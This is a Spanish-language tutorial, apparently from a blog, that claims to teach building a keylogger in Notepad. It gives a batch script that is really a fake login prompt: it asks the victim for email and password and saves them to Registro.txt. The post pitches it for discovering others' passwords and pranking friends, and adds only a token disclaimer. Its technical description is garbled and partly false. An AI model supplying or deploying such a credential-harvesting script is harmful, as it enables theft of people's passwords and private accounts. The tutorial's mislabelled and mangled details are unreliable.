Saltar al contenido

Guía para crear un keylogger usando bloc de notas

Por si no sabían keylogger es una herramienta bastante utilizada por los hackers, aunque es una técnica muy antigua no ha perdido su eficacia. Este registrador de teclas suele utilizarse como walware del tipo deamon para que  otras personas tengan la posibilidad de acceder a nuestras contraseñas ya sean claves de redes sociales, números de tarjeta de crédito u otro tipo de información privada. Este registro de nuestras teclas se puede llevar tanto por  hardware como de software. Por eso mismo si estas interesado en este tipo de técnica para averiguar  contraseñas  y hacer bromas a tus amigos te vamos a recomendar  esta Guía para crear un keylogger usando bloc de notas.

Qué es un Keylogger

Como mencionamos anteriormente Keylogger es un software que registra todas teclas pulsadas en el teclado sin que la victima lo note, es decir, graba por completo todo lo que se escribe en el teclado, y envía el archivo donde se registro la información a un servidor. Muy utilizado por los hackers para acceder a información intima y privada.

crear un keylogger

Como mencionamos al principio pueden ser de 2 tipos tanto Hardware (físico) y Software (lógico). Los primeros necesitan de un acceso físico al equipo y los segundos se logran a través de estrategias de ingeniera social para poder manipular el ordenador.

Cabe destacar de detectar  e identificar un keylogger no es para nada sencillo, sin embargo suelen encontrarse algunas señales permiten darnos cuenta si estamos siendo perjudicados por alguno. Algunas de las señales que podemos notar incluye: navegación y movimiento del mouse muy lento, error al cargar paginas web, pulsaciones de teclado que tardan en aparecer, entre otras señales.

Una vez detectada la amenaza es muy difícil eliminarlo, aunque la forma más eficaz de deshacerse ellos es utilizando software anti-keylogger o bien antivirus de gran peso como secure me un antivirus socialversión gratuita de antivirus kaspersky así  podrás analizar el sistema, detectar el software y eliminarlo de tu computadora.

Ya te enseñamos como manejar este software por si llegas a padecer las consecuencias de alguno de ellos. Ahora vamos a la parte que nos interesa como crear un keylogger usando bloc de notas.Les recomiendo utilizar estos para fines educativos y en sus computadoras ya que aplicados en ordenadores ajenos seria un delito.

Para poder crear uno solo vas a necesitar el bloc de notas. Veamos los pasos a seguir para crear un keylogger usando bloc de notas.

  • Como primer paso, abre tu bloc de notas, y pega el código que le mostraremos a continuación.

@echo off
color a
title Keylogger
cls
echo Por favor ingresa tu correo y contraseña
echo.
echo.
cd “C:Logs”
set /p user=Usuario:
set /p pass=Contraseña:
echo Usuario =”%user%” Contraseña =”%pass%” >> Registro.txt
start >>Program Here<<
exit

  • Como segundo paso tendrás que guardar el archivo y luego en la opción “tipo” seleccionar “todos los archivos”.
  • Como tercer paso, abrí el archivo guardado, introducir usuario y contraseña. Realizada esta acción podrás visualizar el archivo llamado Registro.txt en tu escritorio, en el mismo se encontrara lo que escribiste en usuario y contraseña.